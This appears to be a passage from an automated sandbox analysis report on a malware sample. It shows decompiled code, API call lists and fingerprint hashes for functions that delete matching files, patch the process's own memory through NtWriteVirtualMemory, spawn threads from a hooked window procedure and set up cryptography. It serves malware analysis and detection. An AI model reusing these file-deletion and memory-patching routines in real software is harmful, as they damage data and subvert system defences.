							} while (_t60 != 0);
							goto L22;
						}
					}
				}
				return _t27;
			}



















                                                                                                        0x7098b420
                                                                                                        0x7098b42d
                                                                                                        0x7098b435
                                                                                                        0x7098b43f
                                                                                                        0x7098b445
                                                                                                        0x7098b44a
                                                                                                        0x7098b45b
                                                                                                        0x7098b461
                                                                                                        0x7098b463
                                                                                                        0x7098b469
                                                                                                        0x7098b561
                                                                                                        0x00000000
                                                                                                        0x7098b561
                                                                                                        0x7098b47c
                                                                                                        0x7098b483
                                                                                                        0x7098b550
                                                                                                        0x7098b55b
                                                                                                        0x00000000
                                                                                                        0x7098b494
                                                                                                        0x7098b495
                                                                                                        0x7098b498
                                                                                                        0x7098b4a1
                                                                                                        0x7098b53f
                                                                                                        0x7098b53f
                                                                                                        0x7098b544
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x7098b544
                                                                                                        0x7098b4a7
                                                                                                        0x7098b4ac
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x7098b4b2
                                                                                                        0x7098b4b8
                                                                                                        0x7098b4c0
                                                                                                        0x7098b4c4
                                                                                                        0x7098b4ce
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x7098b4d0
                                                                                                        0x7098b4d4
                                                                                                        0x7098b4f8
                                                                                                        0x7098b4fe
                                                                                                        0x7098b525
                                                                                                        0x7098b52a
                                                                                                        0x7098b52d
                                                                                                        0x00000000
                                                                                                        0x7098b52d
                                                                                                        0x7098b500
                                                                                                        0x7098b511
                                                                                                        0x7098b519
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x7098b520
                                                                                                        0x7098b523
                                                                                                        0x00000000
                                                                                                        0x7098b523
                                                                                                        0x7098b4db
                                                                                                        0x7098b4e2
                                                                                                        0x7098b4ea
                                                                                                        0x7098b4f0
                                                                                                        0x7098b4f4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x7098b530
                                                                                                        0x7098b530
                                                                                                        0x7098b535
                                                                                                        0x7098b536
                                                                                                        0x7098b53b
                                                                                                        0x00000000
                                                                                                        0x7098b546
                                                                                                        0x7098b546
                                                                                                        0x7098b546
                                                                                                        0x00000000
                                                                                                        0x7098b54f
                                                                                                        0x7098b483
                                                                                                        0x7098b44a
                                                                                                        0x7098b565

                                                                                                        APIs
                                                                                                        • NtQuerySystemInformation.NTDLL ref: 7098B435
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00000000,74B04970,74B05520,00000000), ref: 7098B45B
                                                                                                        • NtQuerySystemInformation.NTDLL(00000005,00000000,?,?), ref: 7098B47C
                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000), ref: 7098B498
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 7098B4C6
                                                                                                        • HeapAlloc.KERNEL32(02E70000,00000000,00000200), ref: 7098B4EA
                                                                                                        • HeapReAlloc.KERNEL32(02E70000,00000000,00000000,?), ref: 7098B511
                                                                                                        • VirtualFree.KERNEL32(00000000,00000005,00008000,00000005,00000000,?,?), ref: 7098B55B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Alloc$CurrentHeapInformationQuerySystemVirtual$FreeProcessThread
                                                                                                        • String ID: @
                                                                                                        • API String ID: 494489134-2766056989
                                                                                                        • Opcode ID: ab2ebf1bede340b46e2d4bd3c1977738dfe6343a7e551be50df290a72237223b
                                                                                                        • Instruction ID: 9560322c14920244f4a32179f1d644993baf91e363b9c006cb48c833c672a214
                                                                                                        • Opcode Fuzzy Hash: ab2ebf1bede340b46e2d4bd3c1977738dfe6343a7e551be50df290a72237223b
                                                                                                        • Instruction Fuzzy Hash: 383117B1208305AFE710DF25DD85B2B73B9AB84B45F14882DF996873D1EB70E944CB62
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70982EF0, Relevance: 15.1, APIs: 10, Instructions: 84fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 67%
                                                                                                        			E70982EF0(intOrPtr _a4, intOrPtr _a8) {
				short _v1040;
				short _v1044;
				short _v1048;
				char _v1628;
				struct _WIN32_FIND_DATAW _v1636;
				void* _v1640;
				void* _t22;
				signed char _t23;
				WCHAR* _t31;
				intOrPtr _t44;
				void* _t45;
				FILETIME* _t47;

				_t44 = _a4;
				_push(_a8);
				_push(0x2a);
				_push(_t44);
				_t45 = 0;
				wsprintfW( &_v1044, StrChrW(0x7098c550, 0x25));
				_t47 =  &( &_v1636->ftLastWriteTime);
				_push(0x250);
				_push( &_v1628);
				L7098BF02();
				_t22 = FindFirstFileW( &_v1044,  &_v1636); // executed
				_v1640 = _t22;
				if(_t22 != 0xffffffff) {
					do {
						_t23 = _v1636.dwFileAttributes;
						if((_t23 & 0x00000010) == 0 && _t23 != 0) {
							_push( &(_v1636.cFileName));
							_push(_t44);
							wsprintfW( &_v1048, StrChrW(0x7098c658, 0x25));
							_t47 = _t47 + 0x10;
							_t31 = DeleteFileW( &_v1040);
							if(_t31 == 0) {
								MoveFileExW( &_v1040, _t31, 4);
							}
							_t45 = 1;
						}
					} while (FindNextFileW(_v1640,  &_v1636) != 0);
					FindClose(_v1640);
					return _t45;
				} else {
					return 0;
				}
			}















                                                                                                        0x70982f00
                                                                                                        0x70982f0e
                                                                                                        0x70982f0f
                                                                                                        0x70982f11
                                                                                                        0x70982f19
                                                                                                        0x70982f2c
                                                                                                        0x70982f2e
                                                                                                        0x70982f31
                                                                                                        0x70982f3a
                                                                                                        0x70982f3b
                                                                                                        0x70982f4d
                                                                                                        0x70982f53
                                                                                                        0x70982f5a
                                                                                                        0x70982f70
                                                                                                        0x70982f70
                                                                                                        0x70982f76
                                                                                                        0x70982f80
                                                                                                        0x70982f81
                                                                                                        0x70982f94
                                                                                                        0x70982f96
                                                                                                        0x70982fa1
                                                                                                        0x70982fa9
                                                                                                        0x70982fb6
                                                                                                        0x70982fb6
                                                                                                        0x70982fbc
                                                                                                        0x70982fbc
                                                                                                        0x70982fd1
                                                                                                        0x70982fda
                                                                                                        0x70982fec
                                                                                                        0x70982f5f
                                                                                                        0x70982f68
                                                                                                        0x70982f68

                                                                                                        APIs
                                                                                                        • StrChrW.SHLWAPI(7098C550,00000025,?,0000002A,?,00000000,00000000,00000000,?), ref: 70982F1B
                                                                                                        • wsprintfW.USER32 ref: 70982F2C
                                                                                                        • RtlZeroMemory.NTDLL(?,00000250), ref: 70982F3B
                                                                                                        • FindFirstFileW.KERNEL32(?,?,?,00000250), ref: 70982F4D
                                                                                                        • StrChrW.SHLWAPI(7098C658,00000025,?,?), ref: 70982F89
                                                                                                        • wsprintfW.USER32 ref: 70982F94
                                                                                                        • DeleteFileW.KERNEL32(?), ref: 70982FA1
                                                                                                        • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 70982FB6
                                                                                                        • FindNextFileW.KERNEL32(?,?), ref: 70982FCB
                                                                                                        • FindClose.KERNEL32(?), ref: 70982FDA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: File$Find$wsprintf$CloseDeleteFirstMemoryMoveNextZero
                                                                                                        • String ID:
                                                                                                        • API String ID: 3499340181-0
                                                                                                        • Opcode ID: 70437ab3cd028dff20c295c8bfb41d8af11f807edc198c9e4d54a2c4de8c518a
                                                                                                        • Instruction ID: 612befb7d7f31f1958da066ac93defcd7a96b567f0871dfffd565ce099fe44cc
                                                                                                        • Opcode Fuzzy Hash: 70437ab3cd028dff20c295c8bfb41d8af11f807edc198c9e4d54a2c4de8c518a
                                                                                                        • Instruction Fuzzy Hash: 1F2158B22183419BD220DB65DC88FDF77ACEBC4714F100A1DFA45922C0E736A40997A2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709889F0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90nativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 62%
                                                                                                        			E709889F0() {
				intOrPtr _v4;
				intOrPtr _v12;
				intOrPtr _v28;
				long _v40;
				void _v44;
				void* _v48;
				intOrPtr _v56;
				long _v80;
				char _v88;
				intOrPtr _v92;
				void _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				long _v108;
				intOrPtr _v116;
				intOrPtr _v128;
				long _v132;
				long _t26;
				long _t28;
				long _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t42;
				long _t44;
				union _MEMORY_INFORMATION_CLASS _t47;
				void* _t49;
				intOrPtr _t52;

				_t31 = 0;
				_v80 = 0;
				_t26 = NtQuerySystemInformation(0,  &_v44, 0x2c,  &_v80); // executed
				if(_v28 <= 0) {
					return _t26;
				} else {
					_t52 = _v12;
					_t42 = _v4;
					do {
						_push(0x1c);
						_push( &_v88);
						L7098BF02();
						_t47 = 0;
						_v108 = 0;
						_t28 = NtQueryVirtualMemory(0xffffffff, _t31, 0,  &_v96, 0x1c,  &_v108);
						if(_t28 >= 0 && _v128 == 0x1c) {
							_t32 = _v116;
							if(_v100 == 0x1000 && _v96 == 4 && _v92 == 0x20000 && _v104 != _t42) {
								while(1) {
									_t28 = _t47 + _t32;
									__imp__RtlCompareMemory(_t52, _t28, _t42);
									if(_t28 == _t42) {
										break;
									}
									_t47 = _t47 + 1;
									if(_t47 < _v116 - _t42) {
										continue;
									}
									goto L11;
								}
								_t44 = _v40;
								_t49 = _t47 + _t32;
								_v132 = 0;
								_t30 = NtWriteVirtualMemory(0xffffffff, _t49, _v48, _t44,  &_v132); // executed
								_push(_t44);
								_push(_t49);
								_push(0xffffffff);
								L7098BF4A();
								return _t30;
							}
							L11:
							_t31 = _t32 + _v104;
						}
					} while (_t31 < _v56);
					return _t28;
				}
			}






























                                                                                                        0x709889ff
                                                                                                        0x70988a03
                                                                                                        0x70988a07
                                                                                                        0x70988a10
                                                                                                        0x70988ae2
                                                                                                        0x70988a16
                                                                                                        0x70988a17
                                                                                                        0x70988a1c
                                                                                                        0x70988a21
                                                                                                        0x70988a21
                                                                                                        0x70988a27
                                                                                                        0x70988a28
                                                                                                        0x70988a39
                                                                                                        0x70988a3f
                                                                                                        0x70988a43
                                                                                                        0x70988a4a
                                                                                                        0x70988a5b
                                                                                                        0x70988a5f
                                                                                                        0x70988a80
                                                                                                        0x70988a81
                                                                                                        0x70988a86
                                                                                                        0x70988a8e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70988a94
                                                                                                        0x70988a99
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70988a99
                                                                                                        0x70988ab1
                                                                                                        0x70988ac0
                                                                                                        0x70988ac5
                                                                                                        0x70988acd
                                                                                                        0x70988ad2
                                                                                                        0x70988ad3
                                                                                                        0x70988ad4
                                                                                                        0x70988ad6
                                                                                                        0x00000000
                                                                                                        0x70988add
                                                                                                        0x70988a9b
                                                                                                        0x70988a9b
                                                                                                        0x70988a9b
                                                                                                        0x70988a9f
                                                                                                        0x70988ab0
                                                                                                        0x70988ab0

                                                                                                        APIs
                                                                                                        • NtQuerySystemInformation.NTDLL(00000000,?,0000002C,?), ref: 70988A07
                                                                                                        • RtlZeroMemory.NTDLL(00000100,0000001C), ref: 70988A28
                                                                                                        • NtQueryVirtualMemory.NTDLL(000000FF,00000000,00000000,0000001C,0000001C,?), ref: 70988A43
                                                                                                        • RtlCompareMemory.NTDLL(?,00000000,?), ref: 70988A86
                                                                                                        • NtWriteVirtualMemory.NTDLL(000000FF,00000000,?,?,@)u), ref: 70988ACD
                                                                                                        • NtFlushInstructionCache.NTDLL ref: 70988AD6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Memory$QueryVirtual$CacheCompareFlushInformationInstructionSystemWriteZero
                                                                                                        • String ID: @)u
                                                                                                        • API String ID: 145697856-403505584
                                                                                                        • Opcode ID: b758945649e3cdca6e2c02a35f023d1392eef88f8f16e53c1537a7cc9096ba84
                                                                                                        • Instruction ID: 95b6aab0ec2ceb5d6eb887d8f9e39ec86202e5252a35765d01027eab957aa39f
                                                                                                        • Opcode Fuzzy Hash: b758945649e3cdca6e2c02a35f023d1392eef88f8f16e53c1537a7cc9096ba84
                                                                                                        • Instruction Fuzzy Hash: 3021B172108311AFD714DE55CC84EAFF7A9EBC4764F440A2EF6A6422C0C734A9498BB3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70987D00, Relevance: 12.1, APIs: 8, Instructions: 86threadwindownativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E70987D00(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				void* _t7;
				void* _t8;
				_Unknown_base(*)()* _t10;
				long _t11;
				void* _t12;
				long _t14;
				void* _t17;
				int _t20;
				void* _t22;
				void* _t24;
				struct HWND__* _t25;
				int _t26;
				void* _t27;

				_t20 = _a12;
				_t26 = _a8;
				_t25 = _a4;
				_t27 = _t26 - 0x16;
				if(_t27 > 0) {
					if(_t26 == 0x18) {
						goto L15;
					} else {
						if(_t26 == 0x112) {
							_t7 = _t20 - 0xf020;
							if(_t7 == 0) {
								goto L15;
							} else {
								_t8 = _t7 - 0x10;
								if(_t8 == 0 || _t8 == 0xf0) {
									goto L15;
								} else {
									goto L19;
								}
							}
						} else {
							if(_t26 != 0x83fc) {
								goto L19;
							} else {
								 *0x7098f6c0 = _t20; // executed
								_t12 = CreateThread(0, 0, E70987240, 0, 0, 0x7098f574); // executed
								 *0x7098f570 = _t12;
								goto L15;
							}
						}
					}
				} else {
					if(_t27 == 0) {
						PostMessageW(_t25, 0x10, 0, 0);
						goto L19;
					} else {
						if(_t26 == 3 || _t26 == 7) {
							L15:
							return 0;
						} else {
							if(_t26 == 0x10) {
								 *0x7098f560 = 1;
								if( *0x7098f570 != 0) {
									_t14 =  *0x7098f574; // 0xe40
									PostThreadMessageW(_t14, _t26, 0, 0);
									_t22 =  *0x7098f570; // 0x75c
									if(WaitForSingleObject(_t22, 0x1388) != 0) {
										_t24 =  *0x7098f570; // 0x75c
										NtTerminateThread(_t24, 0);
									}
									_t17 =  *0x7098f570; // 0x75c
									CloseHandle(_t17);
								}
								PostQuitMessage(0);
							}
							L19:
							_t10 =  *0x7098f6c0; // 0x774194c0
							_t11 = CallWindowProcW(_t10, _t25, _t26, _t20, _a16); // executed
							return _t11;
						}
					}
				}
			}
















                                                                                                        0x70987d01
                                                                                                        0x70987d06
                                                                                                        0x70987d0b
                                                                                                        0x70987d0f
                                                                                                        0x70987d12
                                                                                                        0x70987da5
                                                                                                        0x00000000
                                                                                                        0x70987da7
                                                                                                        0x70987dad
                                                                                                        0x70987de6
                                                                                                        0x70987deb
                                                                                                        0x00000000
                                                                                                        0x70987ded
                                                                                                        0x70987ded
                                                                                                        0x70987df0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70987df0
                                                                                                        0x70987daf
                                                                                                        0x70987db5
                                                                                                        0x00000000
                                                                                                        0x70987db7
                                                                                                        0x70987dcb
                                                                                                        0x70987dd1
                                                                                                        0x70987dd7
                                                                                                        0x00000000
                                                                                                        0x70987dd7
                                                                                                        0x70987db5
                                                                                                        0x70987dad
                                                                                                        0x70987d18
                                                                                                        0x70987d18
                                                                                                        0x70987d9a
                                                                                                        0x00000000
                                                                                                        0x70987d1a
                                                                                                        0x70987d1d
                                                                                                        0x70987dde
                                                                                                        0x70987de1
                                                                                                        0x70987d2c
                                                                                                        0x70987d2f
                                                                                                        0x70987d3c
                                                                                                        0x70987d46
                                                                                                        0x70987d48
                                                                                                        0x70987d53
                                                                                                        0x70987d59
                                                                                                        0x70987d6d
                                                                                                        0x70987d6f
                                                                                                        0x70987d78
                                                                                                        0x70987d78
                                                                                                        0x70987d7d
                                                                                                        0x70987d83
                                                                                                        0x70987d83
                                                                                                        0x70987d8b
                                                                                                        0x70987d8b
                                                                                                        0x70987df9
                                                                                                        0x70987dfd
                                                                                                        0x70987e07
                                                                                                        0x70987e10
                                                                                                        0x70987e10
                                                                                                        0x70987d1d
                                                                                                        0x70987d18

                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32 ref: 70987D53
                                                                                                        • WaitForSingleObject.KERNEL32(0000075C,00001388), ref: 70987D65
                                                                                                        • NtTerminateThread.NTDLL(0000075C,00000000), ref: 70987D78
                                                                                                        • CloseHandle.KERNEL32(0000075C), ref: 70987D83
                                                                                                        • PostQuitMessage.USER32(00000000), ref: 70987D8B
                                                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 70987D9A
                                                                                                        • CreateThread.KERNEL32 ref: 70987DD1
                                                                                                        • CallWindowProcW.USER32(774194C0,?,?,?,?), ref: 70987E07
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread$CallCloseCreateHandleObjectProcQuitSingleTerminateWaitWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 1229868629-0
                                                                                                        • Opcode ID: 076dc50a9b565d64050765b02615fb4d8dd6185cc2f2d246faca6432f50518a7
                                                                                                        • Instruction ID: 0be96f63e421f6cb2e9d8f23027daeb9d0ff0dba1f78011e73f0469f91967303
                                                                                                        • Opcode Fuzzy Hash: 076dc50a9b565d64050765b02615fb4d8dd6185cc2f2d246faca6432f50518a7
                                                                                                        • Instruction Fuzzy Hash: CA216F73A183016BE310DB668C58B7AB67CAB94740F20452AF643963E1D771D881A652
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0049B4A0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55encryptionCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 0049B4A7
                                                                                                        • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00000050,0049B33F,00000048,0049B3AE,?,?,00000004,0049B3DC,?,?,?), ref: 0049B50A
                                                                                                          • Part of subcall function 0049B225: __EH_prolog3.LIBCMT ref: 0049B22F
                                                                                                          • Part of subcall function 0049B225: GetLastError.KERNEL32(00000010,0000008C,0049B532,?,?,CryptAcquireContext), ref: 0049B239
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: AcquireContextCryptErrorH_prolog3H_prolog3_catchLast
                                                                                                        • String ID: CryptAcquireContext
                                                                                                        • API String ID: 2794215171-714834122
                                                                                                        • Opcode ID: 04dd797bfbff46d749bdb659af7fcd8a376da2d45480c3ddbcd904392ece15c4
                                                                                                        • Instruction ID: 4aa91081fb9cf29067d9f316b913320168a5be26f9ed3d768d26055c8915dce9
                                                                                                        • Opcode Fuzzy Hash: 04dd797bfbff46d749bdb659af7fcd8a376da2d45480c3ddbcd904392ece15c4
                                                                                                        • Instruction Fuzzy Hash: 2811E770909355AAEB10DFE8ED89BAF7FA8FB01704F08442EF101D7282C7B95E448794
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0049B32E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26encryptionCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 0049B335
                                                                                                          • Part of subcall function 0049B4A0: __EH_prolog3_catch.LIBCMT ref: 0049B4A7
                                                                                                        • CryptGenRandom.ADVAPI32(?,?,?,00000048,0049B3AE,?,?,00000004,0049B3DC,?,?,?,0000000C,004F6CCF,?,?), ref: 0049B348
                                                                                                          • Part of subcall function 0049B225: __EH_prolog3.LIBCMT ref: 0049B22F
                                                                                                          • Part of subcall function 0049B225: GetLastError.KERNEL32(00000010,0000008C,0049B532,?,?,CryptAcquireContext), ref: 0049B239
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3$CryptErrorH_prolog3_catchLastRandom
                                                                                                        • String ID: CryptGenRandom
                                                                                                        • API String ID: 1179229758-3616286655
                                                                                                        • Opcode ID: 3baa3e5310f43f4992fd3537b382bf4f5631a8b03dc6543a258f6241d5714684
                                                                                                        • Instruction ID: 0b8e54217ba43ac14e11ff312a9233512deb590aa70a2d3a4b8af42d778110ac
                                                                                                        • Opcode Fuzzy Hash: 3baa3e5310f43f4992fd3537b382bf4f5631a8b03dc6543a258f6241d5714684
                                                                                                        • Instruction Fuzzy Hash: CFF01C72900109AADF00EBE0D94AFDD7B7CEF58315F40842AF601E6151DB7C96088B65
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 7098B5F0, Relevance: 4.5, APIs: 3, Instructions: 37nativememorythreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E7098B5F0(void** _a4) {
				void* _t6;
				void* _t7;
				void** _t13;
				signed int _t17;
				void* _t20;
				void* _t22;

				_t13 = _a4;
				if( *_t13 != 0) {
					_t17 = 0;
					if(_t13[2] <= 0) {
						L7:
						_t7 =  *0x7098f6d4; // 0x2e70000
						return HeapFree(_t7, 0,  *_t13);
					}
					do {
						_t20 = E7098B1A0(0x5a, 0,  *((intOrPtr*)( *_t13 + _t17 * 4)));
						_t22 = _t22 + 0xc;
						if(_t20 != 0) {
							NtResumeThread(_t20, 0); // executed
							NtClose(_t20); // executed
						}
						_t17 = _t17 + 1;
						_t5 =  &(_t13[2]); // 0xc30cc483
					} while (_t17 <  *_t5);
					goto L7;
				}
				return _t6;
			}









                                                                                                        0x7098b5f1
                                                                                                        0x7098b5f8
                                                                                                        0x7098b5fb
                                                                                                        0x7098b600
                                                                                                        0x7098b630
                                                                                                        0x7098b632
                                                                                                        0x00000000
                                                                                                        0x7098b641
                                                                                                        0x7098b603
                                                                                                        0x7098b612
                                                                                                        0x7098b614
                                                                                                        0x7098b619
                                                                                                        0x7098b61e
                                                                                                        0x7098b624
                                                                                                        0x7098b624
                                                                                                        0x7098b629
                                                                                                        0x7098b62a
                                                                                                        0x7098b62a
                                                                                                        0x00000000
                                                                                                        0x7098b62f
                                                                                                        0x7098b643

                                                                                                        APIs
                                                                                                        • HeapFree.KERNEL32(02E70000,00000000,?,00000000,?,7098B7CC,?,74B05520,00000000), ref: 7098B63B
                                                                                                          • Part of subcall function 7098B1A0: NtOpenThread.NTDLL ref: 7098B1F2
                                                                                                        • NtResumeThread.NTDLL(00000000,00000000), ref: 7098B61E
                                                                                                        • NtClose.NTDLL(00000000), ref: 7098B624
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Thread$CloseFreeHeapOpenResume
                                                                                                        • String ID:
                                                                                                        • API String ID: 3496683721-0
                                                                                                        • Opcode ID: 6ffbba29f547f3355a75b7b40c52cacf84f6b4d669207c55c7068e4fc94d584d
                                                                                                        • Instruction ID: e04a1e617d4a12484623f4cd6043cd3d482859fcc85c157079c9270c1941e0c2
                                                                                                        • Opcode Fuzzy Hash: 6ffbba29f547f3355a75b7b40c52cacf84f6b4d669207c55c7068e4fc94d584d
                                                                                                        • Instruction Fuzzy Hash: 0DF0B431614520AFD7119B45CC81F5E33A8EB89711F180064F5019B3E4D3707C42CBA7
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 7098B340, Relevance: 3.1, APIs: 2, Instructions: 71nativethreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E7098B340(signed int __eax, void* _a4, intOrPtr _a8) {
				void* _v0;
				long _v536;
				intOrPtr _v540;
				struct _CONTEXT _v716;
				struct _CONTEXT _v720;
				void* __edi;
				long _t16;
				intOrPtr _t19;
				long _t20;
				signed int _t27;
				void* _t30;
				intOrPtr _t32;
				long _t37;
				signed int _t39;
				void* _t40;
